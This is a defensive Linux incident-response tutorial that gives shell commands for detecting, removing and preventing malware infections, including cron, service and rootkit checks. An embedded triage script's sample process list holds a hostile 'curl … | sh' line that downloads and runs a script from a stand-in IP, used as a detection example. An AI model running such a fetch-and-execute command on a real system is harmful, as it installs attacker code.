Master Linux Incident Response: Step-by-Step Virus Detection and Removal

This guide walks through a four‑stage Linux incident‑response workflow—identifying symptoms, killing malicious processes, closing persistence mechanisms, and hardening the system—while providing the exact shell commands needed to detect and eradicate Linux malware.

Open Source Linux

Linux incident response is harder than on Windows: there is no equivalent of Autoruns or Process Explorer, and no unified workflow to follow.

This article explains a four‑stage response process for Linux infections and provides the shell commands used at each stage.

1. Identify Symptoms

Start by examining system performance and security alerts to spot suspicious behavior.

Check CPU usage

List processes sorted by CPU usage:

top

Processes using more than 70% CPU under unfamiliar names are likely mining malware.

Detect suspicious processes

Show full command lines:

ps aux

Look for unusual strings, such as URLs, that indicate a downloader.

Security gateway alerts

Identify processes communicating with C&C servers (run as root so the owning PID of every socket is shown):

while true; do netstat -antp | grep [ip]; sleep 1; done

If the malicious host is referenced by a domain name, add a fake entry for it to /etc/hosts and monitor connections to that IP instead.

Check command history

Search for previously executed malicious commands:

history

2. Remove the Virus

Use information gathered in the identification stage to terminate the malicious process and delete its files.

Kill the process

ps -elf | grep [pid] && kill -9 [pid]

Delete the executable

ls -al /proc/[pid]/exe && rm -f [exe_path]

Read the exe link before killing the process, since /proc/[pid] disappears once it exits; a link ending in "(deleted)" means the binary has already removed itself from disk.
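The two stage-1 checks (CPU threshold and URLs in command lines) and the stage-2 "resolve the binary before killing" step, combined into a small triage script. This is an added example, not part of the original article; the function names, the threshold default and the sample ps output are all constructed for it.

```shell
#!/usr/bin/env bash
# Stage-1 triage of `ps aux` output.
# Flags a process when its %CPU is at or above a threshold (mining indicator)
# or when its command line carries a URL (downloader indicator).
# Usage on a live host:  ps aux | triage_ps 70
triage_ps() {
  local threshold="${1:-70}"
  awk -v thr="$threshold" '
    NR == 1 && $1 == "USER" { next }        # skip the ps header line
    {
      pid = $2; cpu = $3 + 0
      cmd = $11; for (i = 12; i <= NF; i++) cmd = cmd " " $i
      if (cpu >= thr)              print "HIGH_CPU pid=" pid " cpu=" cpu " cmd=" cmd
      if (cmd ~ "(https?|ftp)://") print "URL_IN_CMD pid=" pid " cmd=" cmd
    }'
}

# Stage-2 helper: resolve a PID's on-disk binary BEFORE killing it, because
# /proc/<pid>/exe vanishes with the process. A result ending in "(deleted)"
# means the dropper already unlinked itself and only the running image remains.
exe_path_of() {
  readlink "/proc/$1/exe" 2>/dev/null
}

# Constructed sample in `ps aux` layout; PIDs, paths and the
# documentation-range IP are made up for this example.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 16000 800 ? Ss 10:00 0:01 /sbin/init
root 2231 95.3 1.2 512000 9000 ? Sl 10:05 4:12 /tmp/.hidden/miner
www-data 2240 0.3 0.5 90000 4000 ? S 10:06 0:00 /bin/sh -c curl http://198.51.100.7/a.sh|sh
root 2300 2.0 0.3 40000 2000 ? S 10:07 0:00 sshd: root@pts/0'

printf '%s\n' "$SAMPLE_PS" | triage_ps 70
```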

3. Close the Loop (Containment)

Linux persistence mechanisms are fewer than Windows but include scheduled tasks, services, hijacked binaries, daemon processes, and malicious drivers.

Check cron jobs

crontab -l
cat /etc/anacrontab

Inspect services

service --status-all

Search for hijacked system files (binaries modified within the last seven days)

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 -exec ls -la {} \;

Detect malicious daemons

lsof -p [pid]

Scan for rogue drivers

lsmod

Optionally run chkrootkit after installing it:

wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar zxvf chkrootkit.tar.gz
cd chkrootkit-0.52
make sense
./chkrootkit

4. Harden the System

Apply patches for common web vulnerabilities (e.g., Struts2 RCE, ThinkPHP, Redis, Confluence, Drupal) and enforce strong passwords to reduce future infection risk.

Linux malware mainly consists of botnet worms and cryptominers; because Linux servers are often exposed to the internet, unpatched web applications are frequent entry points.

Written by

Open Source Linux

Focused on sharing Linux/Unix content, covering fundamentals, system development, network programming, automation/operations, cloud computing, and related professional knowledge.
